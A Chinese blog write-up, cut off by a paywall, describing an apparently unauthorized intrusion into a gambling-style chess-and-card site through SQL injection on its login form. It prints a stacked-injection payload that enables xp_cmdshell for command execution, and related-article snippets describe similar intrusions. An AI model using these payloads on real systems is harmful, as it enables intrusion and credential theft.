某棋牌站点简单渗透

已于 2023-03-27 16:11:47 修改
阅读量2.6k 收藏 7
点赞数 8
文章标签: 网络安全
于 2023-03-27 16:05:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59757868/article/details/129797492
版权
本文记录了一次针对某棋牌站点的渗透测试过程,包括SQL注入漏洞利用,通过xp_cmdshell执行命令,内网提权,抓取密码,以及尝试RDP劫持和hash传递等技巧。最终,作者成功获取到数据库和网站后台密码。
摘要由CSDN通过智能技术生成

前言:

前几天无意看到了某个师傅的博客,就看到了某棋牌站点的sql注入,于是花了几分钟打了一下,也就当第一次打这种站点,过程非常简单,最后也是获取到了数据库密码,网站后台密码。

sql注入:

该站点如果有师傅打过,肯定有感觉的。

登录框这里存在sql注入,sqlmap跑一下。

但是这里只是一个延时注入,是dba权限

这里就不执行os-shell了,太慢了,直接利用xp_cmdshell执行命令

xp_cmdshell上线:

开启xp_cmdshell:

admin';EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--

执行命令判断出网:

admin';exec master..xp_cmdshell 'ping dn
最低0.47元/天 解锁文章
海龙666
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 16
    评论
微信赌场——H5棋牌游戏渗透之旅
weixin_33904756的博客
05-14 9196
i春秋作家:F0rmat 0x01 前言 本来不想发的,涉及太多利益了,这些棋牌游戏的源码最高能卖到几万。开发起来不比一个商场程序难。最近又太忙了,没时间去做代码审计的文章了,但一不小心又抢了个运气王。。。 0x02 开始 一天做这行的朋友来找我,说帮审计下一套程序,正好这边的缺一篇文章就顺便去看看了。开始看了下目录,找了几个用这套源码的平台来测试,看了下里面的功能。这套源码用的框架是基于Thin...
开源H5棋牌源码.rar
01-03
开源H5棋牌源码,登录微信公众平台,在开发----->基本配置获取开发者ID(AppID)和开发者密码(AppSecret),并设置微信IP白名单,然后在设置----->公众号设置----->功能设置,配置你的业务域名,JS接口安全域名,网页授权域名。然后进入网站后台填写微信appid和微信key,填完之后,点击保存按钮,然后再点击微信access_token的获取按钮,获取他的access_token。这里就全部配置完成了
漏洞挖掘 | 记一次信息泄露到登入后台
最新发布
zkaqlaoniao的博客
06-07 224
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。最后获取到admin的加密密码,密码可解,也是成功登录后台,没getshell但是找到一处任意文件读取,拿着3.8折瑞幸风风火火下班。利用这个返回的JSESSIONID1,拼接到请求包中的Cookie字段,来访问找到的其他路由,发现成功显示。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。这里就不放图了,浓浓的红色气息~
棋牌网站实战渗透
m0_71953083的博客
11-19 1065
棋牌网站后台渗透实战。
渗透某德棋牌游戏
weixin_43639741的博客
05-20 1万+
声明 本文章纯属虚构,如有雷同不胜荣幸,文中一切观点,纯属于作者瞎想与作者本人无关,大牛误喷,不带节奏谢谢!愿互相帮助共同进步 一直找不到目标站点,昨天下午收到的一条微信之后突然有了目标 还是老规则 下载了APP 这里提示下注意事项 因为这种APP是自动采用微信账号登录 且苹果手机登录前需要申请数据网络权限 所以在进行抓包前 需要先点开APP给予数据网络权限并提前登录微信账号(设置代理之后无法...
实战对某棋牌app渗透测试
黑战士的博客
07-22 2万+
某天无聊,看到朋友发过来一个信息,说要测试一个app。只扔过来一个链接,其余什么都没有。 就一个下载页面然后点击下载即可开启“致富”人生。现在很多棋牌都是这种套路直接扔一个静态页面下载软件开玩。真的是能省多少省多少。 废话不多说下载app扔到模拟器测试。 模拟器打开如下: 点击没反应,以为是模拟器的问题于是换个模拟器继续测试发现问题一样。猜测是检测模拟器与手机。现在很多棋牌app都是会检测模拟器的,发现是模拟器运行会各种错误。 于是手机安装: 发现可以正常运行。实锤了是检测模拟器与手机。 app渗透
转-棋牌测试
weixin_49794194的博客
08-19 531
就一个下载页面然后点击下载即可开启“致富”人生。现在很多棋牌都是这种套路直接扔一个静态页面下载软件开玩。真的是能省多少省多少。 废话不多说下载app扔到模拟器测试。 模拟器打开如下: 点击没反应,以为是模拟器的问题于是换个模拟器继续测试发现问题一样。猜测是检测模拟器与手机。现在很多棋牌app都是会检测模拟器的,发现是模拟器运行会各种错误。 于是手机安装: 发现可以正常运行。实锤了是检测模拟器与手机。 app渗透的本质和web渗透区别不大,抓包测试。不过app的数据包有时候在pc打端不开因为不是web服务。
二次开发棋牌源码分享
01-11
综上所述,"二次开发棋牌源码"涉及的不仅仅是简单的编程,还包括了对用户需求的理解、软件工程的原则应用以及对已有代码的深入研究。这种源码对于想要快速进入棋牌游戏市场的企业或者个人开发者来说,是一个宝贵的...
网狐棋牌整理版
03-05
【网狐棋牌整理版】是基于CSDN博主ljxfblog分享的一篇文章的配套代码,主要涉及的是网络棋牌游戏的开发和实现。这个整理版是6603版本,经过博主的精心整理,确保能够成功编译并运行。下面将详细探讨相关知识点。 1....
网狐棋牌项目源码
05-17
《网狐棋牌项目源码详解》 在信息技术领域,尤其是游戏开发行业,源码是开发者进行二次开发和学习的重要资源。"网狐棋牌项目源码"是一个专为棋牌游戏设计的项目,它包含了服务端和客户端的完整源代码,是理解和研究...
高质量棋牌游戏psd源文件
06-20
【高质量棋牌游戏PSD源文件详解】 在数字娱乐领域,棋牌游戏一直深受广大用户的喜爱,而作为开发者或设计师,拥有一套高质量的棋牌游戏PSD源文件无疑是提升项目品质的关键。本资源包含了一个名为“20-牛大元帅”的...
棋牌管理后台 typescript.7z
07-05
用typescript 开发的棋牌游戏管理后台源码 包含mysql
为什么没有黑客攻击棋牌游戏
m0_70754056的博客
07-12 2941
为什么没有黑客攻击,棋牌游戏怎么可能没有,而且每天都有黑客入侵,有一个叫增牛的法外狂徒。今年三十四岁,曾经在云南省某单位做网络技术安全员,十分熟悉网络攻防技术。按理说,他一个月两三万的收入,生活肯定挺滋润,但是他背地里却是个赌徒,太高的薪资也支撑不了他的赌瘾,最终欠下大量的外债。家道中落让增牛恶向胆生,他通过黑客工具解锁到了一家常德市的棋牌游戏运营公司,然后利用pytnon渗透技术入侵了这家公司的数据库后台。由于该公司网络防护薄弱,曾经轻易的就获取到了后台权限之后就找准时机,在一天之内分三次转走了一百零七万
入侵sql serve 后拿服务器_某骗钱的棋牌app下载入侵分析,看黑客的一系列操作...
weixin_39875503的博客
12-15 2951
一天,有人在安全研究人员的QQ邮箱中发送了一封电子邮件。内容是某个国际象棋应用程序的下载链接。他们都知道该领域的应用程序和网站具有欺骗性,因此下面的系列渗透分析操作(内容仅为说明,当您遇到类似的应用程序和网站时不要被欺骗)最初,研究人员使用某个模拟器在其邮箱中安装了某个欺骗应用程序,然后进行了BURP数据包捕获分析通过各种手动分析,在应用程序中的某个位置发现了SQL注入漏洞。以前收集信息...
网狐棋牌经典版管理后台操作手册
热门推荐
Happy丶至上!
06-16 2万+
网狐棋牌_经典版游戏 管理后台操作手册                                       管理平台概述: i.             使用说明: 本手册是提供给运营商阅读使用,帮助运营商更好地理解和使用管理后台内各功能的用法和注意事项。本手册的编写步骤是按“网狐棋牌经典版管理系统”实际显示顺序编写,自上而下,由浅入深进行系统
为什么黑客不黑/攻击赌博网站?如何入门黑客?
m0_71745903的博客
04-11 1572
黑客为什么不攻击赌博网站?如何入门黑客/网络安全
记一次堆叠注入拿shell的总结
jklbnm12的博客
08-29 874
菜鸡第一次实战中碰到mssql的堆叠注入,大佬们轻喷。 本来对堆叠注入没啥了解,这次正巧碰到mssql的堆叠注入,正好加强一下对堆叠注入的理解。 堆叠注入 因为在sql查询语句中, 分号“;”代表查询语句的结束。所以在执行sql语句结尾分号的后面,再加一条sql语句,就造成了堆叠注入。 这种情况很像联合查询,他们的区别就在于联合查询执行的语句是有限的,只能用来执行查询语句,而堆叠注入可以执行任意语句。【零基础点这】 菜鸡不会审计php代码,这里就不贴sql语句的源码了。 下面是渗透流程 先fofa批量找一下
Java基于SpringBoot+Vue台球厅桌球预约系统
QQ123311197的博客
06-30 241
本次设计任务是要设计一个校园台球厅人员与设备管理系统,这个系统能够满足校园台球厅人员与设备的管理及用户的校园台球厅人员与设备管理功能。系统的主要功能包括首页、个人中心、用户管理、会员账号管理、会员充值管理、球桌信息管理、会员预约管理、普通预约管理、留言反馈、系统管理等功能。管理员可以根据系统给定的账号进行登录,登录后可以进入校园台球厅人员与设备管理系统,对校园台球厅人员与设备管理系统所有模块进行管理。包括查看和修改自己的个人信息以及登录密码。
渗透之那些显为人知的RDP漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 2017
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。
棋牌馆管理系统uml
06-03
棋牌馆管理系统是一种管理棋牌馆的软件系统,可以帮助管理人员进行会员管理、桌位管理、财务管理等操作。在UML中,可以采用以下几种图来描述棋牌馆管理系统的设计: 1. 用例图:用于描述系统的功能和参与者之间的关系,可以用于确定系统需求和范围。 2. 类图:用于描述系统中各个类之间的关系,包括继承、聚合、关联等关系。 3. 活动图:用于描述系统中某个场景下的流程,例如会员登录流程、桌位占用流程等。 4. 状态图:用于描述某个对象或者系统在不同状态下的行为和转换。 5. 时序图:用于描述系统中不同对象之间的消息传递和交互顺序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值